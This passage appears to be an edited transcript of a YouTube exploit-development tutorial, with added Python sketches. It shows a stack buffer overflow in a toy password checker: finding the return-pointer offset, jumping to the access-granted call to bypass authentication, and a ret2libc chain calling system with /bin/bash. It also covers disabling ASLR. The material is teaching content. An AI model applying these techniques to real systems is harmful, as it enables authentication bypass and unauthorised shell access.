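The arithmetic behind that `ebp-0x6c` reading can be written out as a short Python sketch. It assumes a standard 32-bit frame with a frame pointer, where the saved EBP sits at `ebp` and the return pointer at `ebp+4`; the constant and function names are made up for this illustration, and the reason for the extra bytes beyond 100 is not identified in the video.

```python
# Sketch of the stack-frame arithmetic, assuming a 32-bit frame with a
# frame pointer: [buffer ... ][saved EBP][return pointer].
# Names are illustrative, not taken from the video.

BUFFER_OFFSET_FROM_EBP = 0x6C   # from "ebp-0x6c" in the disassembly
DECLARED_BUFFER_SIZE = 100      # char pw[100] in the source
WORD_SIZE = 4                   # 32-bit binary (gcc -m32)


def bytes_to_saved_ebp(buffer_offset: int) -> int:
    """Bytes from the start of the buffer up to the saved EBP."""
    return buffer_offset


def bytes_to_return_pointer(buffer_offset: int, word: int = WORD_SIZE) -> int:
    """Bytes from the start of the buffer up to the return pointer."""
    return buffer_offset + word


if __name__ == "__main__":
    to_ebp = bytes_to_saved_ebp(BUFFER_OFFSET_FROM_EBP)
    to_ret = bytes_to_return_pointer(BUFFER_OFFSET_FROM_EBP)
    print("distance to saved EBP:", to_ebp)
    print("extra bytes beyond the declared buffer:", to_ebp - DECLARED_BUFFER_SIZE)
    print("distance to return pointer:", to_ret)
```

Under those assumptions, 108 bytes of input reach the saved EBP, the next 4 bytes replace it, and the 4 bytes after that land on the return pointer.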
Which is great. I mean, you can use the pattern tool, where you create a pattern and then you cause the process to crash, and then a piece of that pattern shows up in the register, and then you can ask the tool how many bytes into the pattern this piece of the pattern was, and it shows you, like, that's the buffer size basically. But this is the more elegant way of doing it, I guess. So we're gonna say run, python -c, print "A" times, I'm going to put 100, so 100 A's, plus I'm going to put in BBBB plus CCCC plus DDDD. And the reason I'm doing this is because we know that if we see 41414141, that's A's, if we see 42424242, that's B's, if we see 43s, that's C's, you get where I'm going. So I'm going to run this. What I'm hoping for is that it crashes and we see some of those values appearing in the registers to help us. Let's see what happens. So right here it says 56556202, and we're at this interesting memory address. Something's obviously gone wrong here. You can see that the base pointer points to DDDD, and the instruction pointer points to this strange address. So what this is telling me is that I'm not seeing 41s or 42s or 43s or 44s showing up in the instruction pointer, but if I successfully overwrite that return pointer, then the instruction pointer should be pointing to those values, because it tried to return to that as an address. So I'm going to run this again, but actually send in four more bytes, so plus EEEE. Run this again, and now look what it says: cannot access memory at 45454545. So the instruction pointer actually did return to that address as if it were real. So pretty neat, correct? If we go back over to the slides here, what we essentially did is send in a bunch of data, and that return pointer down there is what we wanted to overwrite, so by cramming in enough data we eventually were able to overwrite it with our E's. So now we have control of the process; we can tell it to go wherever we want it to go. This ends up letting us get it to run a
shell, sorry, yeah, we should be able to get it to run a shell if I had shellcode or something like that. What I'm going to try and do, and see if it lets me, is maybe I can return back to the access granted function, somewhere I'm not supposed to be able to return to, to bypass authentication. The issue is I didn't compile this as a position independent executable, and it's got ASLR on, so it might not let us do this, but we'll give it a shot, we'll see what happens here. If I disassemble checkpw, these addresses should be pretty consistent. What I want to do is overwrite that return pointer with this address here, so that when it returns, it returns to the call to the granted function, allowing me to bypass authentication. See how that would work? So let's see if we can get it to work, though. I'm going to take my input here, so instead of EEEE, in little endian format, because x86 is a little endian architecture, which means it writes the bytes in reverse order in memory, so we have to write the address in backwards so that it actually gets written forwards, in the right order. So \x36\x62, by the way, the \x means base 16, hexadecimal, \x55\x56. So I've now written that address that I have highlighted in little endian format. That will overwrite this position here where it says return pointer. If it works, it will return to the granted function call, bypassing authentication. So let's see what happens here. I'm going to let it go, and it says stopped, segfault, and we're in the checkpw function, but if I go up top here, look: access granted. So we successfully bypassed authentication. Now, we could have overwritten that with a call to a function or something like that. Like, that's one cool technique to get around ASLR, I mean data execution prevention. There's a technique called Ret2libc; it's an older technique, but it works quite well, where if inside the debugger we say print, let's see here, how about we print system, what this is showing us is the address of the system function, so if I can
return to the system function, I might be able to pass it something like an environment variable, like, pop a shell, like /bin/sh, something like that. There might be some cool opportunities there, so we have a lot of options, which is nice. Well, one thing I just noticed here is, I don't know why this SHELL environment variable is in there, but this says SHELL=/bin/bash, so we might be able to return to that address. If we return to system and pass it the argument of /bin/bash, it might pop a shell, which would be interesting. Let me see if I can print that string out in memory, though. So I'm going to say x/s, that says examine as a string, and then I'm going to give it a memory address, so 0xffffd098. So that's showing us not what I was hoping to see. Let's try this address here, though, so x/s, examine as a string, 0xffffd337. So SHELL=/bin/bash, so we need to go a little forward here. How about 3a, how about 3c, 3d. So /bin/bash is at this memory address, so if we overwrite the return pointer with the address of system and pass it this address as an argument, it might pop a shell. It might not, but we're going to try it, because why not? So let's overwrite the return pointer with the address of system, which I'll highlight real quick, it's that guy, so \xa0\x05\xe2\xf7, and then a four-byte pad, and then finally the address of the shell. So why have a four-byte pad? Because I know someone's going to ask. We are returning to the system function. That is not how you call a function; you don't return to it, you call it. Remember, the first thing that the call instruction does is push the return pointer onto the stack, so this pad that I'm putting there is literally where system will return to when it gets done executing my command. So it's expecting the return pointer to be at that position in memory, so we're just putting a pad there. It'll crash, but hopefully it'll pop my shell first. So let's see if we can make that work. I'm going to put in this address now, which is the address of the /bin/bash string,
so \x3d\xd3\xff\xff, and then let's cross our fingers. We got a seg fault. I don't know if I got a shell or not. Oh yeah, we did, look, see that: detaching after vfork from child process. So it did pop a shell, it just didn't follow the fork. So that's pretty cool, it did actually pop the shell. But here's the thing: it still crashed, though, didn't it? Let's fix that so it doesn't crash and it exits gracefully. Print the address of the exit function. So instead of the pad, I'm going to put the address of the exit function in there, so when it returns it exits cleanly and it doesn't put a log in, you know, that we would see with dmesg. So now I'm going to put this address in, and we'll say \x90\x36\xe1\xf7. Now when I run it, I'm hoping it doesn't crash. It still, no, it did crash anyway. I wonder why it did that; it reports a SIGTRAP. It still did the fork, but for whatever reason, I think it's because we're in a debugger, but normally that would let us exit out cleanly. So you would have popped a shell, and then you would have basically got access, right?
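The two inputs built in this walkthrough (returning to the granted call, then returning into system) can be laid out with Python's struct module. This is a sketch under stated assumptions, not the exact commands typed in the video: the 112-byte offset follows from `ebp-0x6c` plus 4 bytes of saved EBP, the addresses are the ones read out in this particular debugging session and will differ on any other machine or run, and the string address is taken as 0xffffd337 plus the six characters of `SHELL=`. The helper names are made up for illustration.

```python
import struct

# Offsets and addresses from this one debugging session only (assumptions):
OFFSET_TO_RET = 112           # 0x6c bytes up to saved EBP + 4 bytes of saved EBP
GRANTED_CALL = 0x56556236     # address of the call to granted() inside checkpw
SYSTEM_ADDR = 0xF7E205A0      # "print system" in the debugger
EXIT_ADDR = 0xF7E13690        # "print exit" in the debugger
BIN_BASH_ADDR = 0xFFFFD337 + len("SHELL=")   # start of "/bin/bash" in the env


def p32(address: int) -> bytes:
    """Pack a 32-bit address in little endian byte order."""
    return struct.pack("<I", address)


def ret_to_address(target: int) -> bytes:
    """Filler up to the return pointer, then the new return address."""
    return b"A" * OFFSET_TO_RET + p32(target)


def ret2libc(func: int, return_after: int, arg: int) -> bytes:
    """Stack layout a called function expects: [func][its return address][arg]."""
    return b"A" * OFFSET_TO_RET + p32(func) + p32(return_after) + p32(arg)


if __name__ == "__main__":
    print(ret_to_address(GRANTED_CALL)[-4:])
    # A 4-byte pad in the return slot crashes after the command runs;
    # putting exit() there is the "exit cleanly" variant from the transcript.
    print(ret2libc(SYSTEM_ADDR, 0x42424242, BIN_BASH_ADDR)[OFFSET_TO_RET:])
    print(ret2libc(SYSTEM_ADDR, EXIT_ADDR, BIN_BASH_ADDR)[OFFSET_TO_RET:])
```

The middle word is the part people ask about. Because system is reached with a return instead of a call, nothing pushed a return pointer for it, so the input has to supply that slot itself before the argument.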
Yeah, yeah, totally, it's just not following the fork. I'll try it outside the debugger real quickly, but ASLR is on, so I don't know if it's gonna work, but it's okay, we'll give it a shot. Let's copy this. Why isn't it, let me copy that, maybe it did. All right, so what I just looked at there is randomize_va_space, that's the setting for ASLR. I'm going to try and turn that off right now, since we're not going through a, you know, defeating ASLR session right now; that's jumping ahead. I think, for everyone who's watching, let us know in the comments the kind of stuff that you want to see. Stephen's got so much knowledge, and I mean, this is just the beginning, so let us know the kind of stuff that you want to see. echo 0, /proc/sys/kernel, that's the crazy thing, you can turn off ASLR so easily on a Linux box; on Windows you can't do that. All right, so now let's try to run the exploit again. I don't think it's going to be happy. All right, so here's something interesting. We try to run this outside of the debugger, and notice it's saying not found, saying that this crazy thing here is not found. What's happening is it's actually working, so system is actually trying to execute our command, and that's why a shell is printing out this crazy stuff, but the memory layout outside the debugger is different than inside the debugger. So I'm going to try one last thing to see if I can get this to work. I'm gonna create an environment variable now, and let's see if we can find it. So export, and then we're going to call it SYS equals, that's the name of my environment variable, and I want it to simply say /bin/bash, and if I can find that environment variable in memory, then it will execute that. Let me see if I can find it here. So that's the problem now: I need to find that environment variable, which can be really, really tricky. I'm going to look around a little bit. So see how, um, "ln: missing file operand", we're getting weird things getting sent to us; that's because we're
sneaking around in memory. I'm typing different addresses trying to find the string /bin/bash, so sometimes we get a weird message, because we are passing a string to system that it doesn't understand; it's like, what is that? So, for everyone watching, Stephen and I have spent quite a bit of time now trying to manually find the part of memory. Stephen, you can explain it better than I can, but you're missing a piece of software that would allow you to find it, and then when we tried to run bash it wasn't allowing us to do it, right? Yeah, for sure. Unfortunately, there's this little program I wrote, it doesn't do anything fancy, but basically, if you create an environment variable, it will tell you the address where that environment variable will be located. So the first thing we saw was, when the process crashes, we saw this SHELL=/bin/bash that was, for some reason, mapped into the environment. So when I ran it in the debugger, as you saw, we got a shell and it worked; it just didn't follow the fork, but we got a shell. Perfect, awesome. I wanted to get it working outside the debugger real quick, so I was like, maybe I can find this /bin/bash outside the debugger. So we started looking at these environment variables all around here, and by messing around with the memory address we were able to find out exactly where we were. We printed out truecolor, we printed out session manager, and we should have been right here, and we were able to get to some stuff behind that address, but for whatever reason it wasn't actually mapping that specific SHELL environment variable into memory at that spot, even though we found the right address, and we don't know if that's maybe a protection or if for some other reason it's not there. To get around this, you typically can simply create an environment variable yourself and then find the address of that variable and pass it as an argument. And this was just one of the techniques that we were looking at, called Ret2libc, in which you overwrite the return pointer
with the address of a function that's loaded into memory, and you can pass any argument you want to that function, and you get around data execution prevention because the code you're executing is already in the code segment. We're searching through memory here; we just couldn't help ourselves but look around a bit more. We were able to find the =/bin/bash environment variable, and for whatever reason, when we go forward one more byte to 35, which should actually be /bin/bash, it's not popping a shell. We go forward a couple more bytes, like 37, and you can see "in/bash", but for whatever reason it's not popping one, and it probably has to do with, like, the permissions not being set properly, or some other protection that might be running on this box that I'm not compensating for. But we actually had it working perfectly right here in the debugger; it worked. Outside of the debugger it's not, so that leads me to believe that there is another, like, DEP component preventing this from being possible, but a lot of times this works perfectly. So Stephen, the question is always, how do I learn more? You have a bunch of this stuff on your channel, right, and a whole bunch of other things. Yeah, absolutely. So on my channel I tend to weave in and out of exploit development topics, and then we'll go to cloud hacking, and then we'll go to crypto, and just kind of all over the place, because I think it's really fun to have guests on to talk about different areas where they're an expert. What I typically tend to do, like recently, I went through and did some kernel debugging and reverse engineered different exploit mitigations, so that we could understand how these mitigations work at a very low level. So I tend to be in the more advanced spaces, but if there's a topic you'd love to see, I'm happy to do it on that channel, or also here with David of course. But yeah, my Off By One Security channel on YouTube, I try for as many Fridays as possible, at 11 A.M. Pacific time.
So, everyone watching, please go and show your love, go and subscribe to Stephen's channel. Stephen, thanks so much for sharing your knowledge. I know you've been in this game a long time and you have a crazy amount of knowledge, so thanks for, you know, making it freely available on YouTube, really appreciate it. [Music]

Info

Channel: David Bombal

Views: 56,668

Keywords: buffer, buffer overflow, buffer overflow attack, hacking, cracking, attacks, exploit, buffer exploit, buffer underflow, buffer overrun, computer security, Data Buffer, Exploit, exploit development, windows, linux, exploits, zero day, ubuntu, kali, kali linux, windows 11, windows 10, cyber, cybersecurity, hack, hacker, malware, infosec, information security, cyber security, ethical hacking, real world hack, hacking course, cybersecurity course, oscp, buffer overflow exploit, 0day

Id: c2BvS2VqDWg

Length: 55min 39sec (3339 seconds)

Published: Sun Aug 13 2023